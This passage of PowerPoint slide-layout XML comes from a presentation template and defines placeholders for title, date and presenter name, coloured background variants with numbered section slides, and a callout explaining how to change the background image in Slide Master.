          <a:bodyPr lIns="0" tIns="36000" rIns="36000" bIns="36000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="240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
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7200D456-A243-45F2-9216-DF8585E26C1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323036" y="6129338"/>
            <a:ext cx="7167600" cy="381001"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="850" b="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Placeholder 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3DFAA06-BCA8-4754-92E2-D4CD6336640A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="4273068"/>
            <a:ext cx="7166539" cy="216000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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date</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text Placeholder 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99D270A3-CD1B-4C74-9532-388A93562569}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="4514289"/>
            <a:ext cx="7166539" cy="216000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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name and surname of presenter</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46DA9D6C-9ED9-4AC5-BA48-6944457E654D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10098982" y="91025"/>
            <a:ext cx="1888312" cy="1847974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7155340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icture">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="tx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7" y="1520905"/>
            <a:ext cx="7166539" cy="1637364"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="36000" rIns="36000" bIns="36000" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add presentation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7" y="3176198"/>
            <a:ext cx="7166539" cy="732413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="36000" rIns="36000" bIns="36000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="240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
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7200D456-A243-45F2-9216-DF8585E26C1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323036" y="6129338"/>
            <a:ext cx="7167600" cy="381001"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="850" b="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Placeholder 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3DFAA06-BCA8-4754-92E2-D4CD6336640A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="4273068"/>
            <a:ext cx="7166539" cy="216000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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date</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text Placeholder 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99D270A3-CD1B-4C74-9532-388A93562569}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="4514289"/>
            <a:ext cx="7166539" cy="216000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mj-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name and surname of presenter</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46DA9D6C-9ED9-4AC5-BA48-6944457E654D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10098982" y="91025"/>
            <a:ext cx="1888312" cy="1847974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Callout: Line 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2B3AB3A-956C-400C-8EC1-40131D6442E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="12856683" y="0"/>
            <a:ext cx="2038121" cy="4617720"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18750"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val 23170"/>
              <a:gd name="adj4" fmla="val -23198"/>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noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How to change image</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-GB" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Click on ‘View’ on the menu bar</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Choose ‘Slide Master’ </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Insert image and size to fit the page (make sure the coloured strip isn’t covered on the right hand side)</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Right click on the image and choose ‘send to back’</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 View ‘normal’ to exit Slide Master Mode</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1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31394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white_#_1">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8" y="1341438"/>
            <a:ext cx="5552892" cy="1745111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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8" y="3104478"/>
            <a:ext cx="5552892" cy="732413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent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pic>
        <p:nvPicPr>
          <p:cNvPr id="36" name="Picture 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E489B54B-7193-4CFC-A69B-CC135969E161}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="60294" t="22177" r="9338" b="33379"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7351058" y="1520825"/>
            <a:ext cx="3702423" cy="3048080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Text Placeholder 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19163576-E8E1-4806-B23A-BE97EF09C47A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7861768" y="2169251"/>
            <a:ext cx="2519362" cy="1595919"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="12000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>00</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1617222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red_#_1">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07F8FE-17A3-46C6-8E23-99B08D1E4C89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6457101" y="1347665"/>
            <a:ext cx="4965239" cy="3439487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>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8" y="1341438"/>
            <a:ext cx="5552892" cy="1745111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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8" y="3104478"/>
            <a:ext cx="5552892" cy="732413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>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
        <p:nvSpPr>
          <p:cNvPr id="41" name="Text Placeholder 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19163576-E8E1-4806-B23A-BE97EF09C47A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7861768" y="2169251"/>
            <a:ext cx="2519362" cy="1595919"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="12000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>00</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42835958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yellow_#_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent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07F8FE-17A3-46C6-8E23-99B08D1E4C89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6457101" y="1347665"/>
            <a:ext cx="4965239" cy="3439487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>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8" y="1341438"/>
            <a:ext cx="5552892" cy="1745111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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8" y="3104478"/>
            <a:ext cx="5552892" cy="732413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>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
        <p:nvSpPr>
          <p:cNvPr id="41" name="Text Placeholder 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19163576-E8E1-4806-B23A-BE97EF09C47A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7861768" y="2169251"/>
            <a:ext cx="2519362" cy="1595919"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="12000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>00</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6978951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 orange_#_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent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07F8FE-17A3-46C6-8E23-99B08D1E4C89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6457101" y="1347665"/>
            <a:ext cx="4965239" cy="3439487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>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8" y="1341438"/>
            <a:ext cx="5552892" cy="1745111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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8" y="3104478"/>
            <a:ext cx="5552892" cy="732413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>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
        <p:nvSpPr>
          <p:cNvPr id="41" name="Text Placeholder 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19163576-E8E1-4806-B23A-BE97EF09C47A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7861768" y="2169251"/>
            <a:ext cx="2519362" cy="1595919"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="12000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>00</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196932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ogo on yellow">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent2"/>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C26AD0A-B2DA-4BA8-971E-89A9C370B04A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4149377" y="1520825"/>
            <a:ext cx="3893247" cy="3810079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE5BC313-32D1-436C-8952-207862F80069}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="6129338"/>
            <a:ext cx="7166539" cy="381001"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
